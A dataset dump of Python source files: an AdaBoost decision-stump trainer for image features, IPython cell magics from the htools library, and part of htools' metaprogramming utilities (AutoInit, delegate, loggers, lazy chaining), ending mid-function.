        return (integral_img[x + w][y + h] + integral_img[x][y]
                - integral_img[x + w][y] - integral_img[x][y + h])

    max_w, max_h = integral_img.shape
    values = []
    for w in range(5, max_w + 1):
        for h in range(5, max_h + 1):
            for i in range(0, max_w - w, 10):
                for j in range(0, max_h - h, 10):
                    base = rect_sum(i, j, w, h)
                    if i + 2 * w < max_w:
                        right = rect_sum(i + w, j, w, h)
                        values.append(base - right)
                    if j + 2 * h < max_h:
                        below = rect_sum(i, j + h, w, h)
                        values.append(base - below)
                    if i + 3 * w < max_w:
                        # `right` is always bound here: this condition
                        # implies the first branch's condition.
                        far_right = rect_sum(i + 2 * w, j, w, h)
                        values.append(base + far_right - right)
                    if i + 2 * w < max_w and j + 2 * h < max_h:
                        diag = rect_sum(i + w, j + h, w, h)
                        values.append(right + below - base - diag)
    return np.array(values, dtype=float)
class WeakClassifier:
    """Decision stump over a single feature column.

    Predicts `class_` for feature values strictly below `threshold` and the
    opposite class otherwise. `i` records which feature column the stump
    reads; `error` caches its (weighted) training error.
    """

    def __init__(self, threshold: int, class_: int, i: int = None, error=None):
        self.threshold = threshold
        self.class_ = class_
        self.error = error
        self.i = i

    def predict(self, x):
        if x < self.threshold:
            return self.class_
        return -self.class_

    def calculate_error(self, x, y):
        """Fraction of (x, y) samples misclassified; cached on self.error."""
        wrong = sum(1 for xi, yi in zip(x, y) if self.predict(xi) != yi)
        self.error = wrong / len(x)
        return self.error
def generate_classifier(features, y, weights, total_pos, total_neg):
    """Find the best threshold/polarity stump for one feature column.

    Sweeps candidate thresholds in ascending feature order. At each value,
    err_pos/err_neg are the weighted errors of predicting positive/negative
    below the threshold: misclassified mass = class mass still above the
    threshold plus opposite-class mass already below it. Returns the stump
    with minimal weighted error.
    """
    best_threshold = None
    best_error = float('inf')
    best_class = None
    pos_seen = 0
    neg_seen = 0
    for weight, value, label in sorted(zip(weights, features, y), key=lambda t: t[1]):
        err_pos = total_pos - pos_seen + neg_seen
        err_neg = total_neg - neg_seen + pos_seen
        error = min(err_pos, err_neg)
        if error < best_error:
            best_error = error
            best_threshold = value
            best_class = 1 if err_pos < err_neg else -1
        # Accumulate the weight of this sample as "below threshold" for the
        # next, larger candidate value.
        if label == 1:
            pos_seen += weight
        else:
            neg_seen += weight
    return WeakClassifier(best_threshold, best_class, error=best_error)
def find_weak(features, y, weights):
    """Return the lowest-error stump over (at most) the first 5000 features."""
    total_pos = sum(w for w, label in zip(weights, y) if label == 1)
    total_neg = sum(weights) - total_pos
    best = None
    best_error = np.inf
    for idx in range(min(5000, len(features))):
        candidate = generate_classifier(features[idx], y, weights, total_pos, total_neg)
        candidate.i = idx
        if candidate.error < best_error:
            best_error = candidate.error
            best = candidate
    return best
def learn(y, features, start, base_n):
    """AdaBoost training loop.

    Repeatedly fits the best stump on the weighted data, reweights samples,
    and stops once accuracy on the first `base_n` (non-augmented) samples
    reaches 98%. `features` is feature-major: features[f][i] is feature f of
    sample i. `start` is the training start time (only used by the
    commented-out progress print). Returns (stumps, alphas).
    """
    n = len(y)
    weights = [1 / n] * n  # uniform initial sample weights
    hs = []
    alphas = []
    base_accuracy = 0
    t = 0
    while base_accuracy < 0.98:
        h = find_weak(features, y, weights)
        # Standard AdaBoost update: classifier weight and normalizer.
        alpha = 0.5 * math.log((1 - h.error) / h.error)
        z = 2 * math.sqrt(h.error * (1 - h.error))
        # Up-weight misclassified samples, down-weight correct ones.
        for i in range(len(weights)):
            weights[i] *= math.exp(-alpha * y[i] * h.predict(features[h.i][i])) / z
        hs.append(h)
        alphas.append(alpha)
        # Evaluate the current ensemble on the non-augmented samples.
        base_accuracy = 0
        accuracy = 0
        for i, y_ in enumerate(y[:base_n]):
            pred = 0
            for a, h_ in zip(alphas, hs):
                pred += a * h_.predict(features[h_.i][i])
            class_ = np.sign(pred)
            if class_ == y_:
                accuracy += 1
            if i == base_n - 1:
                base_accuracy = accuracy
        base_accuracy /= base_n * 1.0
        # NOTE(review): `accuracy` only counts the first base_n samples yet
        # is divided by n -- looks inconsistent; verify before relying on it.
        accuracy /= n * 1.0
        t += 1
        # print(f'[{t}] accuracy: {accuracy:.3f}\t'
        #       f'base_acciracy: {base_accuracy:.3f}\t'
        #       f'time: {timeit.default_timer() - start:.2f}s')
    return hs, alphas
def save_model(hs, alphas, file):
    """Pickle the ensemble as a list of (classifier, alpha) pairs."""
    pairs = list(zip(hs, alphas))
    with open(file, 'wb') as fh:
        pickle.dump(pairs, fh)
def main(model_file, folder='train'):
    """Train a boosted classifier on images under `folder` and pickle it."""
    start = timeit.default_timer()
    base_n, y, features = get_s(folder)
    # Transpose to feature-major layout: features[f] is one feature across
    # all samples, as expected by learn()/find_weak().
    features = np.transpose(features)
    hs, alphas = learn(y, features, start, base_n)
    save_model(hs, alphas, model_file)
    # Training is expected to finish within 10 minutes.
    assert timeit.default_timer() - start < 600
# NOTE(review): these lines execute at import time, and applicator.py imports
# this module -- importing learner therefore runs main() on applicator's
# argv. Consider an `if __name__ == '__main__':` guard. TODO confirm intent.
folder = sys.argv[-2]
model = sys.argv[-1]
main(model, folder)
| {"/applicator.py": ["/learner.py"]} |
78,145 | hdmamin/htools | refs/heads/master | /htools/magics.py | import inspect
from IPython.core.interactiveshell import InteractiveShell
from IPython.core.magic import cell_magic, magics_class, Magics
from IPython.core.magic_arguments import (argument, magic_arguments,
parse_argstring)
import warnings
from htools.meta import timebox
@magics_class
class InteractiveMagic(Magics):
    """Cell magics that override IPython's ast_node_interactivity setting
    (which statement results a cell displays) for one cell, or persistently
    when the -p flag is given: %%talk shows all, %%hush only the last,
    %%mute none.
    """

    @cell_magic
    @magic_arguments()
    @argument('-p', action='store_true',
              help='Boolean flag. If passed, the change will apply for the '
                   'rest of the notebook, or until the user changes it again. '
                   'The default behavior is to apply the change only to the '
                   'current cell.')
    def talk(self, line=None, cell=None):
        """When Jupyter notebook is in default mode where
        ast_node_interactivity=last (i.e. only the last unprinted statement is
        displayed), this will run the current cell while printing all
        statements. It then resets the mode so future cells only print the
        last statement again.

        Examples
        ---------
        In the example below, each cell contains two statements. Notice that
        the cell containing the magic displays both lines of output, while the
        other cells only display the last output.

        >>> 5 + 10
        >>> 6 + 11
        17

        %%talk
        >>> 6 + 2
        >>> 3 + 1
        8
        4

        >>> 1 + 2
        >>> 3 + 4
        7
        """
        self._adjust_verbosity(cell, 'all', parse_argstring(self.talk, line))

    @cell_magic
    @magic_arguments()
    @argument('-p', action='store_true',
              help='Boolean flag. If passed, the change will apply for the '
                   'rest of the notebook, or until the user changes it again. '
                   'The default behavior is to apply the change only to the '
                   'current cell.')
    def hush(self, line=None, cell=None):
        """The reverse of the `talk` magic. When the notebook is in
        ast_node_interactivty='all' mode, this can be used to suppress outputs
        other than the last one for a single cell. Cells that follow will
        return to the display mode set for the whole notebook.

        Examples
        ---------
        In the example below, each cell contains two statements. Notice that
        the cell containing the magic only displays the last line of output,
        while the other cells display both outputs.

        >>> 5 + 10
        >>> 6 + 11
        15
        17

        %%hush
        >>> 6 + 2
        >>> 3 + 1
        4

        >>> 1 + 2
        >>> 3 + 4
        3
        7
        """
        self._adjust_verbosity(cell, 'last', parse_argstring(self.hush, line))

    @cell_magic
    @magic_arguments()
    @argument('-p', action='store_true',
              help='Boolean flag. If passed, the change will apply for the '
                   'rest of the notebook, or until the user changes it again. '
                   'The default behavior is to apply the change only to the '
                   'current cell.')
    def mute(self, line=None, cell=None):
        """A more extreme version of the `hush` magic that suppresses all
        output from a cell. Cells that follow will return to the default mode
        of ast_node_interactivity='last' unless the -p flag (for persist) is
        provided.

        Examples
        ---------
        In the example below, each cell contains two statements. Notice that
        the cell containing the magic displays no output, while the other
        cells display the final output.

        >>> 5 + 10
        >>> 6 + 11
        17

        %%mute
        >>> 6 + 2
        >>> 3 + 1

        >>> 1 + 2
        >>> 3 + 4
        7
        """
        self._adjust_verbosity(cell, 'none', parse_argstring(self.mute, line))

    def _adjust_verbosity(self, cell, mode, args):
        """Run `cell` under interactivity `mode`; restore the prior mode
        afterwards unless the parsed args requested persistence (-p)."""
        old_setting = InteractiveShell.ast_node_interactivity
        InteractiveShell.ast_node_interactivity = mode
        self.shell.run_cell(cell)
        if not args.p:
            InteractiveShell.ast_node_interactivity = old_setting
@magics_class
class WarningMagic(Magics):
    """Cell magics toggling Python's warning filters for one cell (or
    persistently with -p): %%lax silences warnings, %%nag re-enables them.
    """

    @cell_magic
    @magic_arguments()
    @argument('-p', action='store_true', help='Boolean flag. If passed, the '
              'change will apply for the rest of the notebook, or until the '
              'user changes it again. The default behavior is to apply the '
              'change only to the current cell.')
    def lax(self, line, cell):
        """Silence warnings for a cell. The -p flag can be used to make the
        change persist, at least until the user changes it again.
        """
        args = parse_argstring(self.lax, line)
        self._warn(cell, 'ignore', args.p)

    @cell_magic
    @magic_arguments()
    @argument('-p', action='store_true', help='Boolean flag. If passed, the '
              'change will apply for the rest of the notebook, or until the '
              'user changes it again. The default behavior is to apply the '
              'change only to the current cell.')
    def nag(self, line, cell):
        """Re-enable (always display) warnings for a cell. The -p flag can be
        used to make the change persist, at least until the user changes it
        again.
        """
        args = parse_argstring(self.nag, line)
        self._warn(cell, 'always', args.p)

    def _warn(self, cell, mode, persist):
        """Base method for lax and nag. These could easily be handled in a
        single method with optional flags, but I find the usage to be more
        intuitive when the names are different, and generally prefer flag-free
        magics since the goal is ease of use.

        The persist flag is processed in the child methods because parsing
        references the method that was called.
        """
        warnings.filterwarnings(mode)
        self.shell.run_cell(cell)
        # Reset manually because warnings.resetwarnings() behaved erratically.
        # NOTE(review): this restores the *opposite* fixed mode ('ignore' vs
        # 'always') rather than whatever filter was active before the cell.
        if not persist:
            out_modes = {'ignore', 'always'}
            out_modes.remove(mode)
            warnings.filterwarnings(list(out_modes)[0])
@magics_class
class FunctionRacerMagic(Magics):
    """Cell magic that %%timeit-times each line of a cell separately so
    competing implementations are benchmarked with identical parameters.
    """

    @cell_magic
    @magic_arguments()
    @argument('-n', help='Number of loops when timing functions (inner loop).')
    @argument('-r', help='Number of runs when timing functions (outer loop).')
    def race(self, line, cell):
        """Time 2 or more functions to allow the user to easily compare
        speeds. Each line will be timed separately, so a function call cannot
        take up multiple lines. This is essentially a convenient wrapper for
        the %%timeit magic that ensures all functions are timed with the same
        choice of parameters. (When timing each function separately, I found
        that during the testing process I would often end up changing some
        function or timeit parameters in one case but forget to change it for
        another. This magic aims to prevent that situation.)

        Examples
        ---------
        Example 1: A fairly standard case where we time three possible
        implementations of a function to see which is fastest.

        %%race -n 10 -r 3
        >>> tokenizer_v1(text)
        >>> tokenizer_v2(text)
        >>> tokenizer_v3(text)

        Example 2: If a function requires many arguments or if parameter
        names are long, consider passing in a list or dictionary of arguments.

        %%race
        >>> many_args_func_v1(**params)
        >>> many_args_func_v2(**params)
        """
        args = parse_argstring(self.race, line)
        # Fall back to 5 loops x 3 runs when flags are omitted.
        n = args.n or 5
        r = args.r or 3
        # Split cell into lines of code to execute.
        rows = [row for row in cell.strip().split('\n')
                if not row.startswith('#')]
        prefix = f'%timeit -n {n} -r {r} '
        for row in rows:
            self.shell.run_cell(prefix + row)
@magics_class
class TimeboxMagic(Magics):
    """Timebox a cell's execution to a user-specified duration. As with any
    standard try/except block, note that values can change during execution
    even if an error is eventually thrown (i.e. no rollback occurs).

    Sample usage:

    %%timebox 3
    # Throw error if cell takes longer than 3 seconds to execute.
    output = slow_function(*args)

    %%timebox 3 -p
    # Attempt to execute cell for 3 seconds, then give up. Message is printed
    # stating that time is exceeded but no error is thrown.
    output = slow_function(*args)
    """

    @cell_magic
    @magic_arguments()
    @argument('time', type=int,
              help='Max number of seconds before throwing error.')
    @argument('-p', action='store_true',
              help='Boolean flag: if provided, use permissive '
                   'execution (if the cell exceeds the specified '
                   'time, no error will be thrown, meaning '
                   'following cells can still execute.) If '
                   'flag is not provided, default behavior is to '
                   'raise a TimeExceededError and halt notebook '
                   'execution.')
    def timebox(self, line=None, cell=None):
        args = parse_argstring(self.timebox, line)
        if args.p: cell = self._make_cell_permissive(cell)
        # `timebox` here resolves to the context manager imported from
        # htools.meta, not this method (class scope is not visible inside
        # method bodies).
        with timebox(args.time) as tb:
            self.shell.run_cell(cell)

    @staticmethod
    def _make_cell_permissive(cell):
        """Place whole cell in try/except block. Built-in error handling in
        timebox context manager doesn't work because ipython shell has
        its own logic for error handling, so we need to do this messy string
        manipulation.
        """
        robust_cell = (
            'try:\n\t' + cell.replace('\n', '\n\t')
            + '\nexcept:\n\tprint("Time exceeded. '
            '\\nWarning: objects may have changed during execution.")'
        )
        return robust_cell
# Automatically register all magics defined in this module.
# NOTE(review): relies on `get_ipython` being available as a builtin, i.e.
# this module being imported inside a running IPython session.
magics = (obj for obj in map(locals().get, dir())
          if inspect.isclass(obj)
          and obj.__name__ != 'Magics'
          and issubclass(obj, Magics))
get_ipython().register_magics(*magics)
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,146 | hdmamin/htools | refs/heads/master | /htools/meta.py | from abc import ABC, abstractmethod
import ast
from collections import ChainMap
from contextlib import contextmanager, redirect_stdout
from copy import copy, deepcopy
from functools import wraps, partial, update_wrapper
from fuzzywuzzy import fuzz, process
import importlib
import inspect
from inspect import Parameter, signature, _empty, getsource, ismethod
import io
import json
import logging
import os
from pathlib import Path
import pkgutil
import signal
import ssl
import sys
from threading import Thread
import time
from tqdm.auto import tqdm
import types
import urllib
import warnings
from weakref import WeakSet
from htools.core import hdir, load, save, identity, hasstatic, tolist,\
select, func_name
from htools.config import STD_LIB_GIST
class AutoInit:
    """Mixin class where child class has a long list of init arguments where
    the parameter name and the class attribute will be the same. Note that
    *args are not supported in the init method because each attribute that is
    defined in the resulting object must have a name. A variable length list
    of args can still be passed in as a single argument, of course, without the
    use of star unpacking.

    This updated version of AutoInit is slightly more user friendly than in V1
    (no more passing locals() to super()) but also slower and probably requires
    more testing (all because of the frame hack in the init method). Note that
    usage differs from the AutoInit present in htools<=2.0.0, so this is a
    breaking change.

    Examples
    --------
    Without AutoInit:

    class Child:
        def __init__(self, name, age, sex, hair, height, weight, grade, eyes):
            self.name = name
            self.age = age
            self.sex = sex
            self.hair = hair
            self.height = height
            self.weight = weight
            self.grade = grade
            self.eyes = eyes
        def __repr__(self):
            return f'Child(name={self.name}, age={self.age}, sex={self.sex}, '\
                   f'hair={self.hair}, weight={self.weight}, '\
                   f'grade={self.grade}, eyes={self.eyes})'

    With AutoInit:

    class Child(AutoInit):
        def __init__(self, name, age, sex, hair, height, weight, grade, eyes):
            super().__init__()

    Note that we could also use the following method, though this is less
    informative when constructing instances of the child class and does not
    have the built in __repr__ that comes with AutoInit:

    class Child:
        def __init__(self, **kwargs):
            self.__dict__.update(kwargs)
    """
    def __init__(self):
        # Calculate how many frames to go back to get child class.
        # The index of AutoInit in the child's MRO approximates the number of
        # __init__ frames between this call and the child's __init__ (one per
        # intermediate class, assuming each calls super().__init__()) — the
        # "frame hack" mentioned in the class docstring.
        frame_idx = type(self).__mro__.index(AutoInit)
        # Grab the child __init__'s local variables; dunder names (and below,
        # 'self') are excluded because they aren't real init parameters.
        attrs = {k: v for k, v in sys._getframe(frame_idx).f_locals.items()
                 if not k.startswith('__')}
        attrs.pop('self')
        bound = signature(self.__class__.__init__).bind_partial(**attrs)
        # Flatten dict so kwargs are not listed as their own argument.
        bound.arguments.update(
            bound.arguments.pop('kwargs', {}).get('kwargs', {})
        )
        # Remember which names were set so __repr__ can report exactly them.
        self._init_keys = set(bound.arguments.keys())
        for k, v in bound.arguments.items():
            try:
                setattr(self, k, v)
            except Exception as e:
                # Deliberately best-effort: a failed setattr (e.g. a property
                # with no setter) becomes a warning rather than an error.
                warnings.warn(f'Failed to set attribute {k}. {str(v)}')

    def __repr__(self):
        """Returns string representation of child class including variables
        used in init method. For the example in the class docstring, this would
        return:

        child = Child('Henry', 8, 'm', 'brown', 52, 70, 3, 'green')
        Child(name='Henry', age=8, sex='m', hair='brown', height=52,
              weight=70, grade=3, eyes='green')

        Returns
        -------
        str
        """
        fstrs = (f'{k}={repr(getattr(self, k))}' for k in self._init_keys)
        return f'{self.__class__.__name__}({", ".join(fstrs)})'
def auto_repr(cls):
    """Class decorator that generates a __repr__ from __init__'s signature.

    A simpler alternative to AutoInit that needs no access to the arguments
    passed at construction time. An attribute appears in the repr only when
    it lives in the instance dict AND shares its name with a parameter of
    __init__ — renamed attributes and properties are silently excluded.

    Parameters
    ----------
    cls: type
        The class to decorate.

    Returns
    -------
    type: The same class with a __repr__ attached.

    Examples
    --------
    @auto_repr
    class Foo:
        def __init__(self, a, b=6, c=None, p=0.5, **kwargs):
            self.a = a
            self.b = b
            # Stored under a different name, so excluded from the repr.
            self.cat = c
            # Properties are not in the instance dict, so also excluded.
            self.p = p

    >>> Foo(3, b='b', c='c')
    Foo(a=3, b='b')
    """
    def _repr(obj):
        named = signature(obj.__init__).parameters
        pieces = [f'{name}={value!r}' for name, value in vars(obj).items()
                  if name in named]
        return f'{type(obj).__name__}({", ".join(pieces)})'

    cls.__repr__ = _repr
    return cls
def delegate(attr, iter_magics=False, skip=(), getattr_=True):
"""Decorator that automatically delegates attribute calls to an attribute
of the class. This is a nice convenience to have when using composition.
User can also choose to delegate magic methods related to iterables.
Note: I suspect this could lead to some unexpected behavior so be careful
using this in production.
KNOWN ISSUES:
-Max recursion error when a class inherits from nn.Module and
delegates to the actual model.
-Causes pickling issues at times. Haven't figured out cause yet.
Parameters
----------
attr: str
Name of variable to delegate to.
iter_magics: bool
If True, delegate the standard magic methods related to iterables:
'__getitem__', '__setitem__', '__delitem__', and '__len__'.
# TODO: maybe consider adding __contains__? It most cases it should be
fine - I believe python falls back to rely on __getitem__ - but if the
object being delegated to defines some special __contains__ logic that
is different than iterating using __getitem__, we might run into
problems.
skip: Iterable[str]
Can optionally provide a list of iter_magics to skip. This only has
an effect when `iter_magics` is True. For example, you may want to be
able to iterate over the class but no allow item deletion. In this case
you should pass skip=('__delitem__').
getattr_: bool
If True, delegate non-magic methods. This means that if you try to
access an attribute or method that the object produced by the decorated
class does not have, it will look for it in the delegated object.
Examples
--------
Example 1: We can use BeautifulSoup methods like `find_all` directly on
the Page object. Most IDEs should let us view quick documentation as well.
@delegate('soup')
class Page:
def __init__(self, url, logfile, timeout):
self.soup = self.fetch(url, timeout=timeout)
...
page = Page('http://www.coursera.org')
page.find_all('div')
Example 2: Magic methods except for __delitem__ are delegated.
@delegate('data', True, skip=('__delitem__'))
class Foo:
def __init__(self, data, city):
self.data = data
self.city = city
>>> f = Foo(['a', 'b', 'c'], 'San Francisco')
>>> len(f)
3
>>> for char in f:
>>> print(char)
a
b
c
>>> f.append(3); f.data
['a', 'b', 'c', 3]
>>> del f[0]
TypeError: 'Foo' object doesn't support item deletion
>>> f.clear(); f.data
[]
"""
def wrapper(cls):
def _delegate(self, attr):
"""Helper that retrieves object that an instance delegates to.
Just makes things a little easier to read here so we're not
layering getattr calls too deeply.
"""
return getattr(self, attr)
# Any missing attribute will be delegated.
if getattr_:
def _getattr(self, new_attr):
return getattr(_delegate(self, attr), new_attr)
cls.__getattr__ = _getattr
# If specified, delegate magic methods to make cls iterable.
if iter_magics:
if '__getitem__' not in skip:
def _getitem(self, i):
return _delegate(self, attr)[i]
setattr(cls, '__getitem__', _getitem)
if '__contains__' not in skip:
def _contains(self, i):
return i in _delegate(self, attr)
setattr(cls, '__contains__', _contains)
if '__setitem__' not in skip:
def _setitem(self, i, val):
_delegate(self, attr)[i] = val
setattr(cls, '__setitem__', _setitem)
if '__delitem__' not in skip:
def _delitem(self, i):
del _delegate(self, attr)[i]
setattr(cls, '__delitem__', _delitem)
if '__len__' not in skip:
def _len(self):
return len(_delegate(self, attr))
setattr(cls, '__len__', _len)
return cls
return wrapper
class LoggerMixin:
    """Mixin class that configures and returns a logger.

    Examples
    --------
    class Foo(LoggerMixin):

        def __init__(self, a, log_file):
            self.a = a
            self.log_file = log_file
            self.logger = self.get_logger(log_file)

        def walk(self, location):
            self.logger.info(f'walk received argument {location}')
            return f'walking to {location}'
    """

    def get_logger(self, path=None, fmode='a', level='info',
                   fmt='%(asctime)s [%(levelname)s]: %(message)s'):
        """
        Parameters
        ----------
        path: str or None
            If provided, this will be the path the logger writes to.
            If left as None, logging will only be to stdout.
        fmode: str
            Logging mode when using a log file. Default 'a' for
            'append'. 'w' will overwrite the previously logged messages. Note:
            this only affects what happens when we create a new logger ('w'
            will remove any existing text in the log file if it exists, while
            'a' won't. But calling `logger.info(my_msg)` twice in a row with
            the same logger will always result in two new lines, regardless of
            mode.
        level: str
            Minimum level necessary to log messages.
            One of ('debug', 'info', 'warning', 'error')
        fmt: str
            Format that will be used for logging messages. This uses the
            logging module's formatting language, not standard Python string
            formatting.

        Returns
        -------
        logging.Logger
        """
        # When working in Jupyter, need to reset handlers. Otherwise every
        # time we run a cell creating an instance of the logged class, the
        # list of handlers will grow.
        logger = logging.getLogger(type(self).__name__)
        logger.handlers.clear()
        logger.setLevel(getattr(logging, level.upper()))

        # handler.basicConfig() doesn't work in Jupyter.
        formatter = logging.Formatter(fmt)
        handlers = [logging.StreamHandler(sys.stdout)]
        if path:
            # A bare file name like 'tmp.log' has an empty dirname;
            # os.makedirs('') raises, so only create directories when the
            # path actually contains one.
            parent = os.path.dirname(path)
            if parent:
                os.makedirs(parent, exist_ok=True)
            handlers.append(logging.FileHandler(path, fmode))
        for handler in handlers:
            handler.setFormatter(formatter)
            logger.addHandler(handler)
        return logger

    def remove_stdout_handler(self):
        """Stop logger from logging to stdout. Do not change this to mutate
        self.handlers - that doesn't work. Probably means I need to
        debug `delegate` a bit.
        """
        self.logger.handlers = [handler for handler in self.logger.handlers
                                if 'stdout' not in str(handler)]
@delegate('logger')
class MultiLogger(LoggerMixin):
    """Easy way to get a pre-configured logger. This can also be used to
    record stdout, either through the context manager provided by contextlib
    or the function decorator defined in this module.

    It delegates to its logger and should be used as follows when explicitly
    called by the user:

    logger = MultiLogger('train.log')
    logger.info('Starting model training.')

    Notice we call the `info` method rather than `write`.
    """

    def __init__(self, path, fmode='w', fmt='%(message)s'):
        """
        Parameters
        ----------
        path: str or Path
            The log file to save to. If None is provided, will only log to
            stdout.
        fmode: str
            One of ('a', 'w'). See `LoggerMixin` docstring: this only affects
            behavior on the first write.
        fmt: str
            Message format. See `LoggerMixin` docstring for details.
        """
        self.logger = self.get_logger(path, fmode, 'info', fmt)

    def write(self, buf):
        """Provided for compatibility with `redirect_stdout` to allow logging
        of stdout while still printing it to the screen. The user should never
        call this directly.
        """
        # redirect_stdout funnels everything written to stdout through this
        # method; skipping the lone '\n' chunks avoids logging an empty
        # record for every print statement's trailing newline.
        if buf != '\n':
            self.logger.info(buf)
def verbose_log(path, fmode='w', fmt='%(message)s'):
    """Decorator that logs a function's stdout to a file while still printing
    it to the screen. Commonly used for model training.

    Parameters
    ----------
    path: str or Path
        Log file. May contain str.format-style fields referencing the
        decorated function's argument names, e.g. 'logs/{model_name}.txt',
        which are filled in from the actual call arguments.
    fmode: str
        One of ('a', 'w') for 'append' mode or 'write' mode. Note that 'w'
        only overwrites the existing file once per call that creates a new
        logger; it does not wipe content between writes within a call.
    fmt: str
        String format for logged messages. Uses the `logging` module's
        formatting language, not standard Python string formatting.
    """
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            # Resolve any argument references embedded in the log path.
            call_args = bound_args(func, args, kwargs, True)
            sink = MultiLogger(path.format(**call_args), fmode, fmt)
            with redirect_stdout(sink):
                return func(*args, **kwargs)
        return wrapper
    return decorator
def monkeypatch(obj, attr):
    """Decorator that monkeypatches an existing object with a user-defined
    function. The patch is applied at function-definition time, with a
    warning announcing it.

    Parameters
    ----------
    obj: any
        The object to monkeypatch.
    attr: str
        The attribute to override on obj. Presumably this will be a function.

    Examples
    --------
    @monkeypatch(sys, 'excepthook')
    def excepthook(type_, val, tb):
        traceback.print_exception(type_, val, tb)
        pdb.post_mortem(tb)

    sys.excepthook now equals our `excepthook` function, dropping us into a
    debugger whenever an error is thrown. (This minimal example doesn't seem
    to work in ipython.)
    """
    def _decorate(func):
        msg = (f'Registering function {func} as attribute "{attr}" on '
               f'object {obj}.')
        warnings.warn(msg)
        setattr(obj, attr, func)

        @wraps(func)
        def _passthrough(*args, **kwargs):
            return func(*args, **kwargs)
        return _passthrough
    return _decorate
class SaveableMixin:
    """Provide object saving and loading methods. If you want to be able to
    pass a file name rather than a full path to `save`, the object can define
    a `self.dir` attribute.
    """

    def save(self, path=None, fname=None):
        """Pickle object with optional compression.

        Delegates the actual serialization to htools.core.save (imported at
        the top of this module).

        Parameters
        ----------
        path: str or Path
            Path to save object to.
        fname: str or Path
            If passed in, method will use this as a filename within the
            object's `dir` attribute.
        """
        # NOTE(review): assert vanishes under `python -O`; consider raising
        # ValueError for this argument check instead.
        assert not fname or not path, 'Can\'t pass in both fname and path.'
        # Fall back to self.dir/fname when no explicit path was given.
        path = path or Path(self.dir) / fname
        save(self, path)

    @classmethod
    def load(cls, path):
        """Load object from pickle file.

        Delegates to htools.core.load (imported at the top of this module).

        Parameters
        ----------
        path: str or Path
            Name of file where object is stored.
        """
        return load(path)
def chainmethod(func):
    """Decorator enabling eager method chaining on instance methods.

    Chainable methods should mutate one or more instance attributes and
    return None. The decorator runs each call on a deep copy of the instance
    and returns that copy, so chained operations never touch the original
    object.

    Examples
    --------
    @auto_repr
    class EagerChainable:

        def __init__(self, arr, b=3):
            self.arr = arr
            self.b = b

        @chainmethod
        def double(self):
            self.b *= 2

        @chainmethod
        def append(self, n):
            self.arr.append(n)

    >>> ec = EagerChainable([1, 3, 5, -22], b=17)
    >>> ec2 = ec.append(99).double()
    >>> ec2
    EagerChainable(arr=[1, 3, 5, -22, 99], b=34)
    >>> ec   # Remains unchanged.
    EagerChainable(arr=[1, 3, 5, -22], b=17)
    """
    @wraps(func)
    def wrapper(instance, *args, **kwargs):
        clone = deepcopy(instance)
        func(clone, *args, **kwargs)
        return clone
    return wrapper
def lazychain(func):
    """Decorator registering a method as chainable within a LazyChainable
    class.
    """
    # LazyChainMeta looks for this flag. It survives @wraps below because
    # wraps copies func.__dict__ onto the wrapper.
    func._is_chainable = True

    @wraps(func)
    def inner(*args, **kwargs):
        return func(*args, **kwargs)
    return inner
class LazyChainMeta(type):
    """Metaclass to create LazyChainable objects.

    For every staticmethod flagged by @lazychain (e.g. `_sub`), it generates
    a public method (`sub`) that, instead of executing, appends a partial of
    the private method to the instance's `ops` queue and returns the instance
    so calls can be chained. The queue runs when exec() is called.
    """
    def __new__(cls, name, bases, methods):
        new_methods = {}

        # Find chainable staticmethods and create public versions.
        for k, v in methods.items():
            try:
                # __get__(1) unwraps the staticmethod descriptor (any dummy
                # instance works); anything without _is_chainable — or not a
                # descriptor at all — raises and is skipped by the bare
                # except below.
                func = v.__get__(1)
                assert func._is_chainable
            except:
                continue
            public_name = k.lstrip('_')

            # Get args and kwargs passed to staticmethod (except for instance).
            sig = signature(func)
            sig = sig.replace(parameters=list(sig.parameters.values())[1:])

            # Must use default args so they are evaluated within loop.
            def make_public_method(func=func, private_name=k,
                                   public_name=public_name, sig=sig):
                def public(inst, *args, **kwargs):
                    # Queue the call rather than executing it now; exec()
                    # later supplies the instance copy as the first argument.
                    bound = sig.bind(*args, **kwargs).arguments
                    new_method = partial(getattr(inst, private_name), **bound)
                    inst.ops.append(new_method)
                    return inst
                public.__name__ = public_name
                return public

            new_methods[public_name] = make_public_method()
        return type.__new__(cls, name, bases, {**methods, **new_methods})
class LazyChainable(metaclass=LazyChainMeta):
    """Base class that allows children to lazily chain methods,
    similar to a Spark RDD.

    Chainable methods must be decorated with @staticmethod
    and @lazychain and be named with a leading underscore. A public
    method without the leading underscore will be created, so don't
    overwrite this with another method. Chainable methods
    accept an instance of the same class as the first argument,
    process the instance in some way, then return it. A chain of
    commands will be stored until the exec() method is called.
    It can operate either in place or not.

    Examples
    --------
    class Sequence(LazyChainable):

        def __init__(self, numbers, counter, new=True):
            super().__init__()
            self.numbers = numbers
            self.counter = counter
            self.new = new

        @staticmethod
        @lazychain
        def _sub(instance, n):
            instance.counter -= n
            return instance

        @staticmethod
        @lazychain
        def _gt(instance, n=0):
            instance.numbers = list(filter(lambda x: x > n, instance.numbers))
            return instance

        @staticmethod
        @lazychain
        def _call(instance):
            instance.new = False
            return instance

        def __repr__(self):
            pre, suf = super().__repr__().split('(')
            argstrs = (f'{k}={repr(v)}' for k, v in vars(self).items())
            return f'{pre}({", ".join(argstrs)}, {suf}'

    >>> seq = Sequence([3, -1, 5], 0)
    >>> output = seq.sub(n=3).gt(0).call().exec()
    >>> output
    Sequence(ops=[], numbers=[3, 5], counter=-3, new=False)
    >>> seq   # Unchanged because exec was not in place.
    Sequence(ops=[], numbers=[3, -1, 5], counter=0, new=True)

    >>> output = seq.sub(n=3).gt(-1).call().exec(inplace=True)
    >>> output   # None because exec was in place.
    >>> seq      # Changed.
    Sequence(ops=[], numbers=[3, -1, 5], counter=-3, new=False)
    """
    def __init__(self):
        # Queue of pending (partially-bound) operations; LazyChainMeta's
        # generated public methods append to this.
        self.ops = []

    def exec(self, inplace=False):
        # Run the queued chain on a deep copy so the original instance is
        # only mutated when inplace=True.
        new = deepcopy(self)
        for func in self.ops:
